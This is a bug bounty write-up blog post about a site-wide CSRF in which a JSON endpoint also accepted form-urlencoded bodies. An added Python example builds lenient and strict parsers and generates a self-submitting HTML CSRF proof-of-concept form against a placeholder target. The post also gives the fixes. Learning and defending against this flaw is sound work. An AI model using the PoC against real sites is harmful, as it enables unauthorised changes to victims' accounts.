Site wide CSRF on popular program

fellchase.blogspot.com · devanshbatham/Awesome-Bugbounty-Writeups · vulnerability
Wednesday, February 05, 2020

I found this bug in the same program that I wrote about in the post "Authorization bug every bug hunter missed".

I was moving through another target on this program when I noticed that there was no CSRF protection: no anti-CSRF tokens or anything like that. So I wondered what they were relying on to prevent CSRF. I noticed some high-entropy strings in the request headers, but the request worked without those headers as well, so that wasn't what was protecting the website from CSRF.

The request body consisted of JSON objects, basically {key: "value"} pairs. The assumption behind using JSON is that in a typical CSRF attack the attacker can't send a JSON payload: a cross-site HTML form can only submit its body as application/x-www-form-urlencoded, multipart/form-data or text/plain, and a cross-origin XMLHttpRequest or fetch() that sets Content-Type: application/json triggers a CORS preflight that the server never approves. So using JSON will, supposedly, protect the application against CSRF by itself.

Here's where the trick comes in. It's really more of a check you should perform whenever you're looking for CSRF bugs. I first spotted it on Twitter; you may or may not be familiar with it. Here's how it works.

It's very simple. Assume the server-side framework expects JSON input in the HTTP request body by default, so when it detects a JSON object it parses it automatically. But if you send the body with a regular Content-Type, application/x-www-form-urlencoded, it automatically parses that too and starts using the values. The problem is caused by not checking the Content-Type: if you're expecting JSON input, it should be strictly application/json.

So in this case, to trigger the CSRF, I just sent a regular CSRF payload, an HTML form POST whose field names matched the JSON keys. Because of their negligence in not validating the Content-Type header to be strictly JSON, the server accepted the regular HTTP parameters and the CSRF triggered.

[Screenshot of the replayed request; the visible field names are primaryPhoneType and firstName.]
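The mechanism above, as an added example that is not the post's code and not taken from the program in question. It models, with only the Python standard library, a body parser that auto-detects the format (the vulnerable behaviour) next to one that insists on application/json (the fix), plus the attacker-side conversion of the JSON body into a form-urlencoded body and a self-submitting HTML form. The target URL https://target.example/api/profile, the field values, and all function names are assumptions; only the two field names primaryPhoneType and firstName come from the post's screenshot.

```python
"""Added example: Content-Type mismatch behind a JSON-body CSRF.

Assumptions (not from the post): the endpoint URL, the field values, and
the two parser functions, which stand in for a framework that guesses the
body format rather than for any specific framework.
"""
import html
import json
from urllib.parse import parse_qs, urlencode

TARGET_URL = "https://target.example/api/profile"  # assumed endpoint

# Constructed sample of the application's own JSON request body.
ORIGINAL_JSON_BODY = json.dumps({"primaryPhoneType": "mobile", "firstName": "Alice"})


def media_type(content_type):
    """Media type without parameters, lower-cased:
    'Application/JSON; charset=utf-8' -> 'application/json'."""
    return content_type.split(";", 1)[0].strip().lower()


def parse_body_lenient(content_type, body):
    """Vulnerable behaviour: parse JSON if the Content-Type says JSON,
    otherwise fall back to form fields. The handler downstream gets the
    same dict either way, so it cannot tell a cross-site <form> POST from
    the app's own JavaScript request."""
    if media_type(content_type) == "application/json":
        return json.loads(body)
    # Flatten repeated keys to the first value, as most frameworks do.
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def parse_body_strict(content_type, body):
    """Hardened behaviour: only application/json is acceptable here;
    anything else is answered with 415 Unsupported Media Type. A cross-site
    <form> cannot set that Content-Type, and a cross-origin fetch()/XHR that
    sets it triggers a CORS preflight the server can refuse."""
    if media_type(content_type) != "application/json":
        raise ValueError("415 Unsupported Media Type: expected application/json")
    return json.loads(body)


def json_to_form_body(json_body):
    """Attacker-side step from the post: re-encode the same key/value pairs
    as application/x-www-form-urlencoded. Only flat scalar values convert
    cleanly; nested objects and arrays have no form encoding that every
    framework accepts, so refuse them instead of guessing."""
    obj = json.loads(json_body)
    for key, value in obj.items():
        if isinstance(value, (dict, list)):
            raise ValueError(f"field {key!r} is nested; this trick needs flat parameters")
    return urlencode(obj)


def csrf_poc_html(target_url, form_body):
    """Self-submitting form for the proof of concept. A plain <form> POST is
    a 'simple request': the browser sends it cross-site, with cookies
    (subject to SameSite), and without a CORS preflight."""
    fields = "\n".join(
        f'  <input type="hidden" name="{html.escape(k)}" value="{html.escape(v[0])}">'
        for k, v in parse_qs(form_body, keep_blank_values=True).items()
    )
    return (
        f'<form id="csrf" method="POST" action="{html.escape(target_url)}">\n'
        f"{fields}\n</form>\n"
        "<script>document.getElementById('csrf').submit();</script>\n"
    )


def demo():
    """Replay the finding: the re-encoded body yields the same dict from
    the lenient parser as the JSON did, and is rejected by the strict one."""
    form_body = json_to_form_body(ORIGINAL_JSON_BODY)
    content_type = "application/x-www-form-urlencoded"
    lenient_result = parse_body_lenient(content_type, form_body)
    try:
        parse_body_strict(content_type, form_body)
        strict_rejected = False
    except ValueError:
        strict_rejected = True
    return {
        "form_body": form_body,
        "lenient_result": lenient_result,
        "strict_rejected": strict_rejected,
        "poc": csrf_poc_html(TARGET_URL, form_body),
    }


if __name__ == "__main__":
    result = demo()
    print(result["form_body"])
    print(result["lenient_result"])
    print("strict parser rejected it:", result["strict_rejected"])
    print(result["poc"])
```

Two things beyond the parser still decide whether the replayed form actually works cross-site: the browser has to attach the session cookie (a cookie marked SameSite=Lax or Strict is not sent on a cross-site POST), and the server must not be validating the Origin or Referer header. Also note that form values always arrive as strings, so a handler that expects JSON numbers or booleans may reject or silently coerce them; and the mirror-image check is worth running too: if the server parses the body as JSON regardless of Content-Type, a form with enctype="text/plain" can carry a JSON-looking body.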
This could have been prevented by validating the Content-Type header to be application/json. In my case the server was accepting regular HTTP POST parameters alongside the expected JSON, so I reported the bug, but my report was marked as a duplicate 😩 of someone who had reported site-wide CSRF using Flash.

If you find JSON objects being passed around in the HTTP body without CSRF protection, try changing them to regular HTTP parameters and see if the request still works. If the server-side application accepts non-JSON parameters, it'll process the input and you may be able to get a CSRF. Happy bug hunting.

Labels: bug bounty, write up

Ajinkya Pathare: Guy with a business degree interested in finance, web security and programming

Comments

pforprathm, Wednesday, February 12, 2020, 2:11:00 pm: How do you perform the CSRF (by converting the JSON to a form body)?